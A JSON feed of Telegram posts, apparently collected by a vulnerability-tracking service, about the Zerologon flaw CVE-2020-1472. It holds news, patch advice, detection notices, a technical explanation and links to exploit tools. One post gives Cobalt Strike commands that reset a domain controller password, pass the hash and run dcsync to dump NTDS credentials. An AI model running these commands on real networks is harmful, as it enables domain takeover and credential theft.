"vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/BleepingComputer/8310", "content": "Hackers used VPN flaws to access US govt elections support systems\n\nGovernment-backed hackers\u00a0have compromised and gained access to US elections support systems by chaining together VPN vulnerabilities and the recent Windows CVE-2020-1472 security flaw. 
[...]\n\nhttps://www.bleepingcomputer.com/news/security/hackers-used-vpn-flaws-to-access-us-govt-elections-support-systems/", "creation_timestamp": "2020-10-12T18:40:46.000000Z"}, {"uuid": "9024cea8-69c8-4468-a20c-2413cf24f708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/alexmakus/3640", "content": "Admins are being urged in every way to patch the CVE-2020-1472 vulnerability in Microsoft netlogon as quickly as possible \n\nhttps://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc\n\nhttps://www.secura.com/blog/zero-logon\n\nhttps://github.com/SecuraBV/CVE-2020-1472", "creation_timestamp": "2020-09-15T15:27:25.000000Z"}, {"uuid": "7fc9e359-2eaf-43aa-9a7e-e40d9b88c437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/hybgl/430", "content": "#windows #CVE #privesc #zerologon\n\n[ CVE-2020-1472  Netlogon authentication bypass testing ]\n\nhttps://github.com/SecuraBV/CVE-2020-1472\n\n\nDetails:  https://www.secura.com/pathtoimg.php?id=2055", "creation_timestamp": "2021-07-22T16:10:45.000000Z"}, {"uuid": "7376edc3-fc36-46ee-a1ed-cf9d40c66fde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source":
"https://t.me/is_n3ws/36", "content": "The NSA analyzed attacks by Chinese government hackers and released a report. Top-20 exploited vulnerabilities.\n\nhttps://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF\n\nGaining Remote Access: \n-----------------------------\nCVE-2019-11510: Arbitrary file read/Pulse Secure VPN\nCVE-2019-19781: RCE/Citrix ADC\nCVE-2020-8195/3/6: Unauthenticated access\nCVE-2019-0708: RCE on RDP server\nCVE-2020-5902: RCE in F5 BIG-IP\n\nAD:\n----\nCVE-2020-1472: #ZeroLogon\nCVE-2019-1040: NTLM relay bypass\n\nMDM: \n------\nCVE-2020-15505: MobileIron device management\n\nExploiting Public Facing Services:\n---------------- \nCVE-2020-1350: RCE/ DNS Servers #SigRed\nCVE-2018-6789: RCE/ Exim mail transfer\nCVE-2018-4939: RCE/ Adobe's Cold Fusion\n\nWorkstation Local Privilege Escalation:\n-------------------------\nCVE-2020-0601: ECC spoofing #CurveBall\nCVE-2019-0803: Win32k Elevation of Privilege\n\nInternal Applications:\n--------------------\nCVE-2020-0688: RCE/MS Exchange\nCVE-2020-2555: RCE/Oracle Weblogic\nCVE-2019-11580: RCE/Atlassian Crowd\nCVE-2019-18935: RCE/ASP.Net\nCVE-2015-4852: RCE/Apache\nCVE-2019-3396: Unauthorized Access/Confluence\nCVE-2020-10189: RCE/Desktop Central", "creation_timestamp": "2020-11-06T22:00:17.000000Z"}, {"uuid": "9fafaa2c-22f9-4046-ba38-92517df0d13d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author":
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/1694", "content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 414 entries related to CVE-2020-1472. An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974450000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-11T03:25:21.000000Z"}, {"uuid": "6778a585-c10e-4ab7-813c-1c632891a50c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/12GQmhdjAZoUy0KyEWtwA71DbE079snwo4quD3RJiXmYXw", "content": "", "creation_timestamp": "2020-09-16T06:13:02.000000Z"}, {"uuid": "abd1f127-c84a-4cf8-89bf-d3c83b5cd829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/7Qrvv0n_A492fFBBgAcKrfKClVFk6YoFPN9jHzyI2JtJfpE", "content": "", "creation_timestamp": "2020-10-01T10:36:08.000000Z"}, {"uuid": "0d52c406-1e9b-46ef-983a-694a124ccd58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/anwar1213xx/979", "content": "Vulnerabilities for hacking Windows:\n\nEveryone who uses the Windows operating system or the
Microsoft Office application suite must update them; updates have been released to patch 120 vulnerabilities, 18 of which have a severity rated \"critical\" and 2 of which are already being heavily exploited\nThese vulnerabilities expose your device to compromise in the following cases:\nVulnerabilities CVE-2020-1525 and CVE-2020-1585 can lead to your device being compromised by playing a video file.\nVulnerability CVE-2020-1548 can lead to your device being compromised by playing an audio file.\nVulnerabilities CVE-2020-1560 and CVE-2020-1574 can lead to your device being compromised by opening an image file.\nVulnerability CVE-2020-1483 can
lead to your device being compromised if you use the Microsoft Outlook application to receive messages.\nVulnerability CVE-2020-1567 can lead to your device being compromised if you try to edit an HTML page.\nVulnerability CVE-2020-1380 can lead to your device being compromised if you try to open a certain website in the Internet Explorer 11 browser.\nVulnerability CVE-2020-1472 in the NetLogon component can raise the attacker's privileges and allow them to compromise your device if it is connected to a Domain Controller (DC), which is mostly used inside organizations.\nVulnerabilities CVE-2020-1494, CVE-2020-1495, CVE-2020-1496, CVE-2020-1504 and CVE-2020-1498
can lead to your device being compromised if you open an Excel sheet file in the affected version of Microsoft Excel.\nVulnerability CVE-2020-1571 can raise the attacker's privileges through use of the application responsible for installing Windows itself\n\nThe Yemeni ghost\nMy pride is crazy", "creation_timestamp": "2021-10-08T16:50:51.000000Z"}, {"uuid": "78ea6e33-696e-42e4-bd6a-0b2e9a4d11d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/true_secator/7103", "content": "Kaspersky Lab researchers keep bombarding us with reports; this time they delivered analytics on exploits and vulnerabilities for the first
quarter of 2025.\n\nIn the first quarter of 2025, publication continued of vulnerabilities discovered and fixed in 2024, since some researchers had previously been unable to disclose the details.\n\nOverall, the quarter's figures show a fairly large number of registered vulnerabilities, while the dynamics of their registration largely repeat previous years.\n\nOverall, many CWEs
from the TOP 10 for Microsoft software and the Linux kernel coincide or are analogous, which means the vulnerabilities are based on similar principles, which often leads to \"porting\" of attack mechanisms from Linux to Windows and vice versa.\n\nIn the first quarter of 2025, the number of attacks using exploits for the Windows platform grew compared with the same period of last year.\n\nAs before, the lion's share of detected exploits
targeted Microsoft Office products.\n\nThe researchers note that their solutions most often detected exploits for the Windows platform for the following old vulnerabilities: CVE-2018-0802, CVE-2017-11882 (both RCE in Equation Editor), CVE-2017-0199 (Microsoft Office and WordPad).\n\nAll three remained the most widespread throughout 2024, and we assume this trend will continue going forward.\n\nThey are followed by no less popular issues in WinRAR and in the Windows operating system itself: CVE-2023-38831 (WinRAR), CVE-2024-35250
(a vulnerability in the ks.sys driver) and CVE-2022-3699 (a vulnerability in the Lenovo Diagnostics driver).\n\nFor the Linux operating system, the most exploits were detected for the following vulnerabilities: CVE-2022-0847 (Dirty Pipe), CVE-2019-13272 (a vulnerability in improper handling of privilege inheritance) and CVE-2021-3156 (a heap overflow in the sudo utility).\n\nIn the first quarter of 2025, operating systems, as the most complex software, continue to lead in the number of
published exploits.\n\nIn addition, steady growth in the number of browser exploits is being recorded - this trend also held throughout all of last year.\n\nThe share of exploits for vulnerabilities in Microsoft Office products also increased.\n\nHaving studied data on APT attacks, Kaspersky singled out the following as the most frequently used in the first quarter of 2025: CVE-2025-0282, CVE-2024-21887 and CVE-2025-0283 (Ivanti Connect Secure), CVE-2020-1472 (Netlogon Windows), CVE-2023-46805 (Ivanti ICS), CVE-2023-48788 (Fortinet) and others.\n\nNote that
the well-known critical vulnerability Zerologon, which allows gaining access to a domain controller, has returned to the TOP 10.\n\nAs the most interesting vulnerabilities published in the first quarter of 2025, Kaspersky researchers highlighted: \n\n- ZDI-CAN-25373: a vulnerability that breaks the display of lnk file parameters in Windows;\n\n- CVE-2025-21333: a heap buffer overflow vulnerability in the vkrnlintvsp.sys driver;\n\n- CVE-2025-24071: a NetNTLM hash leak vulnerability in
the file system indexer.\n\nDetailed statistics and infographics are in the report.", "creation_timestamp": "2025-06-04T18:00:07.000000Z"}, {"uuid": "fb6705f2-ec9d-4966-8257-fe3bc2a43143", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/YAH_Channel/327", "content": "We wrote a guide to detecting exploitation of one of the most dangerous vulnerabilities of recent years: CVE-2020-1472, or Zerologon.\n\nIt allows an attacker to take over a domain controller even without having any user account.
To exploit the vulnerability, the attacker only needs to connect to the corporate network.\n\nDuring the research we developed various methods for detecting Zerologon exploitation:\n\u25aa\ufe0ffrom Windows audit log events;\n\u25aa\ufe0ffrom network traffic;\n\u25aa\ufe0fusing YARA rules.\n\nThese methods can be used either separately or together, which makes it possible not only to detect exploitation
of the vulnerability but also to speed up incident classification.\n\nRead more about each of the detection methods in our article.", "creation_timestamp": "2020-11-03T14:25:29.000000Z"}, {"uuid": "40cd8a35-db2c-48b3-8573-75d4414c3fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "Telegram/BukL9V416GWTLpIflWe5h5lu1HR9vVf6UKjMPBsKx6eT_Q", "content": "", "creation_timestamp": "2020-10-09T23:40:07.000000Z"}, {"uuid": "cc57b3cf-3f92-41ad-bffa-73d3cee5ca91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/kHAG78X2RtYAPuQ25BOUIrC4WsYU58YO06E33bWQ-2Pwlw", "content": "", "creation_timestamp": "2020-09-16T06:13:02.000000Z"}, {"uuid": "c8c7e240-6a37-4288-88ee-278f02f0b80d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/bizone_channel/148", "content": "We wrote a guide to detecting
exploitation of one of the most dangerous vulnerabilities of recent years: CVE-2020-1472, or Zerologon.\n\nIt allows an attacker to take over a domain controller even without having any user account. To exploit the vulnerability, the attacker only needs to connect to the corporate network.\n\nDuring the research we developed various methods for detecting Zerologon exploitation:\n\u25aa\ufe0ffrom Windows
audit log events;\n\u25aa\ufe0ffrom network traffic;\n\u25aa\ufe0fusing YARA rules.\n\nThese methods can be used either separately or together, which makes it possible not only to detect exploitation of the vulnerability but also to speed up incident classification.\n\nRead more about each of the detection methods in our article.", "creation_timestamp": "2020-11-03T14:19:18.000000Z"}, {"uuid": "cfed6de1-9b68-4312-8554-5b2409150762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/895",
"content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 412 entries related to CVE-2020-1472. An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974580000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-02T23:44:05.000000Z"}, {"uuid": "227366f7-a791-4b1a-85f0-eedf1b232088", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/134", "content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 406 entries related to CVE-2020-1472. An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974540000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-11-13T00:58:03.000000Z"}, {"uuid": "72e08f53-618b-4cb3-8c88-81cde515017e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3126", "content": "Tools \ud83d\udd27 \ud83d\udd28 \ud83d\udd27 \ud83d\udd28  - Hackers Factory\n\n\u200b\u200bTor / Darknet Links\n\nVerified darknet market and darknet service links on the Tor Network.\n\nhttps://github.com/DarkNetEye/tor-links\n\nWeb:\nhttps://darkneteye.com/\n\n#cybersecurity #infosec #privacy\n\n\u200b\u200bDragondoom\n\nThe PAKE Dragonfly is used as SAE in WPA3 authentication. 
A critical point during the authentication is when the password needs to be derived into an elliptic curve point.\n\nhttps://gitlab.inria.fr/ddealmei/artifact_dragondoom\n\n#cybersecurity #infosec\n\n\u200b\u200bwhatlicense\n\nFull tool chain to extract WinLicense secrets from a protected program then launch it bypassing all verification steps, utilizing an Intel PIN tool and license file builder.\n\nhttps://github.com/charlesnathansmith/whatlicense\n\n#infosec #pentesting #bugbounty\n\n\u200b\u200bCVE-2022-44875\n\nTesting CVE-2022-44875\n\nhttps://github.com/c0d30d1n/CVE-2022-44875-Test\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bWiFi-OSINT\n\nSome great Wifi, resources, tools and blogs if Wi-Fi #OSINT is your thing.\n\nhttps://github.com/cqcore/WiFi-OSINT\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bCVE-2023-35885\n\nCloudpanel 0-day Exploit\n\nhttps://github.com/datackmy/FallingSkies-CVE-2023-35885\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2023-3519\n\nThis script is a basic Citrix Scanner for CVE-2023-3519. We try to identify vulnerable Citrix Gateways/ADCs by looking at the HTTP headers.\n\nhttps://github.com/telekom-security/cve-2023-3519-citrix-scanner\n\n#cve #infosec #pentesting\n\n\u200b\u200bvala-vala-hey\n\nThis is a 0day root LPE for latest #Manjaro distro, tested on embedded ARM and x86_64 desktop installs.\n\nhttps://github.com/c-skills/vala-vala-hey\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2020-1472\n\nA Python script that uses the Impacket library to test vulnerability for the Zerologon exploit (CVE-2020-1472).\n\nhttps://github.com/SecuraBV/CVE-2020-1472\n\n#cve #cybersecurity #infosec\n\nEX-SQLi\n\nA tool for scanning and exploiting the famous SQL injection vulnerability in more than millions of sites. 
The exploit was programmed by the TYG team.\n\nhttps://github.com/mr-sami-x/SQLi\n\n#infosec #pentesting #redteam\n\n\u200b\u200bCVE-2023-38632\n\nAsync-sockets-cpp <0.3.1 TCP Packet tcpsocket.hpp Stack-based Overflow\n\nhttps://github.com/Halcy0nic/CVE-2023-38632\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bCVE-2023-3519\n\nThis Nuclei template checks for the presence of the CVE-2023-3519 vulnerability in a target web server.\n\nhttps://github.com/SalehLardhi/CVE-2023-3519\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bCVE-2023-28121\n\nWooCommerce Payments: Unauthorized Admin Access #Exploit.\n\nhttps://github.com/gbrsh/CVE-2023-28121\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bVanMoof Encryption Key Exporter\n\nExport all bike details (such as encryption key) of your VanMoof bikes.\n\nhttps://github.com/grossartig/vanmoof-encryption-key-exporter\n\nWeb:\nhttps://keyexporter.grossartig.io/\n\n#cybersecurity #infosec\n\n\u200b\u200bPowershellKerberos\n\nSome scripts to abuse kerberos using Powershell.\n\nhttps://github.com/MzHmO/PowershellKerberos\n\n#infosec #pentesting #redteam\n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-07-23T12:08:55.000000Z"}, {"uuid": "718df4ae-9852-4eb6-afbc-57c1621763a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/EgyptHackerTeam/451", "content": "Exploiting CVE-2020-1472 Zerologon in Cobalt Strike\n\nDownload the script here\nhttps://github.com/rsmudge/ZeroLogon-BOF\n\nInclude the script as usual, the address is\nZeroLogon-BOF/dist/zerologon.cna\n\nThe console should show a new command - zerologon\n\nApplication:\n\nnet domain - get domain name (e.g. domain.local)\n\nRun the exploit:\nzerologon iunderstand domain.local\n\niunderstand - stop word. By exploiting this vulnerability we reset the password. 
This exploit can lead to a failure of the domain controller. WE USE IT LAST.\n\nIn case of success we get:\nSuccess! Use pth .\\\\\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync\n\nDo exactly what it says.\npth .\\\\\\%S 31d6cfe0d16ae931b73c59d7e0c089c0\n\nAnd run\ndcsync domain.local\n\nIf everything worked successfully, we get NTDS", "creation_timestamp": "2023-08-07T01:03:46.000000Z"}, {"uuid": "4221f757-4b9d-4c66-8a7e-bbf198f5c2f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/GDSpace/9", "content": "\u200b\u200bTenable.ad. Real-time protection against attacks on Active Directory\n\nActive Directory, even when configured correctly, is a favorite target of attackers for privilege escalation and lateral movement. 
We will demonstrate emulation of real attacks on Active Directory, including Brute Force, DCShadow and DCsync, and their detection with Tenable.ad. We will also look at the functionality for detecting AD configuration errors, such as CVE-2020-1472 (\"Zerologon\"), errors in password policies, privileged accounts under which Kerberos services run, and others.\n\n#GDS\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b\u0413\u043e\u0432\u043e\u0440\u044f\u0442\u00a0#GlobalDigitalSpace \ud83d\ude80", "creation_timestamp": "2022-06-02T21:43:31.000000Z"}, {"uuid": "ad79f10c-862a-431c-9a8c-4098f911c6cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/arpsyndicate/1448", "content": "#ExploitObserverAlert\n\nCVE-2020-1472\n\nDESCRIPTION: Exploit Observer has 414 entries related to CVE-2020-1472. 
An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.\n\nFIRST-EPSS: 0.974580000\nNVD-IS: 6.0\nNVD-ES: 3.9", "creation_timestamp": "2023-12-05T09:54:43.000000Z"}, {"uuid": "e085d1a1-d4ff-428a-840c-439b186559a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/DSUpJzd535KWvozjCvixS0aCLxmEfW4QzhCQOssR_q3Zo9k", "content": "", "creation_timestamp": "2025-03-07T10:00:06.000000Z"}, {"uuid": "3f9038d6-98cf-42d4-8a10-f4560855d4a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/reconshell/359", "content": "CVE-2020-1472 - Zerologon Exploit POC\n\n#Zerologon #Exploit #CVE-2020-1472 #CyberSecurity #DataCenterHack #RedTeam\n\nhttps://reconshell.com/cve-2020-1472-zerologon-exploit-poc/", "creation_timestamp": "2021-01-24T20:35:03.000000Z"}, {"uuid": "6e247f6d-77c1-4886-900f-0442601132f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "Telegram/t56b3Q9Pzy6RNlSuP7aXlCGnrtD_6yp__frASOXq_ro", "content": "", "creation_timestamp": "2021-10-08T16:50:48.000000Z"}, {"uuid": "21f3d5cc-4d7e-44cd-a2b1-a1f800c5c2a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/true_secator/941", "content": "\u200b\u200bIf you still 
don't have enough reasons to install Microsoft's August security update to fix the CVE-2020-1472 vulnerability, aka Zerologon, in Windows Server, which lets a hacker take over a domain controller simply by gaining access to one of the internal hosts, here is one more argument.\n\nBenjamin Delpy, lead developer of Mimikatz, a legitimate tool for extracting authentication data from Windows that, 
ironically, has become one of the tools most used by hackers, reported that he has just added Zerologon exploit support to Mimikatz. \n\nThis means that, since Mimikatz is open source, soon every script kiddie will learn to hammer networks running Windows Server.\n\nIf Delpy had done this before Microsoft's patch was released, we would have called him (and that's putting it mildly) a scoundrel. 
As it is, Benjamin is effectively acting as the forest's cleanup crew: only the strongest will survive. Harsh, but such is infosec life. The hunt for woodpeckers is declared open!", "creation_timestamp": "2020-09-16T14:48:00.000000Z"}, {"uuid": "14e604e4-e430-4dc4-8663-240d2ce83760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/0vZqUc7_DNu-pgRIOwk91_AhN3qHmSP4_uy4v4-hV_gZFA", "content": "", "creation_timestamp": "2020-10-11T04:50:18.000000Z"}, {"uuid": "c7b79268-1f5a-40c3-a4b4-269dce360f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/DIFndr5_kT1gv9_ye4a4QhDIX4iiu14XmmAF7D7NJ1dKeA", "content": "", "creation_timestamp": "2020-09-23T14:02:01.000000Z"}, {"uuid": "272cd296-7866-4ab1-a3d3-a5f9e31526dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/true_secator/930", "content": "A great stir 
arose in the infosec community after today's publication by the Dutch infosec company Secure BV of technical details of the CVE-2020-1472 vulnerability, dubbed Zerologon, which Microsoft fixed in its August update.  \n\nAlthough it was already known that the bug scored 10 out of 10 on the severity scale and concerns privilege escalation in Netlogon, the authentication service in Windows Server, full information was not available. 
It appeared today and set everyone abuzz.\n\nThe vulnerability lies in a flaw in the cryptographic authentication of the Netlogon Remote Protocol. It allows an attacker to impersonate any host on the network, including the domain controller itself. In addition, the hacker can disable Netlogon authentication security features and change a password in Active Directory. \n\nSo where exactly was the bug? 
In the implementation of the AES-CFB8 encryption algorithm in the ComputeNetlogonCredential function, where the initialization vector (IV) is fixed and consists of 16 zero bytes, although security requirements say it must be random. As a result, for 1 in 256 keys, encrypting an all-zero input yields an all-zero output.\n\nWhy is that bad? 
Because a hacker, by trying several times in a row (the average expected number of attempts is 256), can bypass the authentication process, since one of its key parameters, ClientCredential, is computed precisely with ComputeNetlogonCredential. 
That is, on average in 1 out of 256 attempts the server, on receiving a client request of 8 zeros, will expect a ClientCredential that is also 8 zeros.\n\nAnd since the account of the connecting computer is not locked out after a wrong answer, with a simple sequence of attempts to feed the server 8 zeros, which takes about 3 seconds, the attacker will pass the authentication process. 
\n\nThe hacker will then perform a few more tricks related to the ComputeNetlogonCredential vulnerability in order to take full control of the domain controller.\n\nThe only limitation on the attack is that the attacker must carry it out from inside the network, having first compromised one of the machines. 
But in many cases that is a solvable problem.\n\nThe patch Microsoft released in August fixes the Zerologon vulnerability by making it mandatory to enable the NRPC transport encryption mechanism, which a hacker could bypass simply by disabling it on the client side (this was allowed). \n\nInfosec experts consider Zerologon a very easy-to-exploit and very dangerous vulnerability - \"This is really scary\". 
To keep it from being \"scary\", you just need to update your Windows Servers in a timely manner.", "creation_timestamp": "2020-09-14T16:57:49.000000Z"}, {"uuid": "eb2fe7e0-a1c3-4ff5-a63b-db2d4598d249", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/true_secator/969", "content": "Microsoft Security Intelligence reports that it is observing hacker activity right now using an exploit for the CVE-2020-1472 vulnerability, aka Zerologon. \n\nWhich is exactly what we were talking about. 
Whoever hasn't managed to update their Windows Server will end up with a compromised network.", "creation_timestamp": "2020-09-24T08:36:39.000000Z"}, {"uuid": "b8b3c85a-efe5-45c5-9dd9-8c2e25cca5e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/tomhunter/168", "content": "If you're happily self-isolating while working remotely with a corporate work machine, you surely go through the morning, lunchtime and pre-work rituals of logging in to the corporate domain. 
So you'll be interested in one of the ways your account can be stolen during this simple process.\n\nIf you're sitting at your own workstation, read the post anyway, but you may do so without respect.\n\nLet's start with the fact that the account you use to log in to your computer can be one of two types. 
If it's your local device, then most likely your account is local too, created right on your machine. If the login and password were issued to you at a large company where you work, then that account will be a domain one, that is, created within a certain workgroup.\n\nDomain accounts are convenient to create precisely for large networks, in which whole 
groups of users (hello, silent corporate no-names) with different access rights are defined. This mechanism was invented to simplify managing a large number of users. Add a new admin to the \"Admins\" group, and he already has all the necessary access and rights on all machines.\n\nI have just tried to describe, in simple terms and very briefly, how the MS Active Directory service works. 
\u0412 \u0441\u0430\u043c\u043e\u0439 \u0441\u043b\u0443\u0436\u0431\u0435 \u0437\u0430 \u0440\u0430\u0437\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u043f\u043e \u0433\u0440\u0443\u043f\u043f\u0430\u043c-\u0434\u043e\u043c\u0435\u043d\u0430\u043c \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u043e\u0432 (domain controller) \u0438 \u043e\u043d\u0438 \u0436\u0435 \u0441\u043b\u0435\u0434\u044f\u0442 \u0437\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0430\u0432 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u043a \u044d\u0442\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0435.\n\n\u041d\u043e \u043a\u0430\u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 \u0443\u0437\u043d\u0430\u0435\u0442, \u0447\u0442\u043e \u0442\u044b \u043f\u044b\u0442\u0430\u0435\u0448\u044c\u0441\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 \u0435\u0433\u043e \u0433\u0440\u0443\u043f\u043f\u044b? 
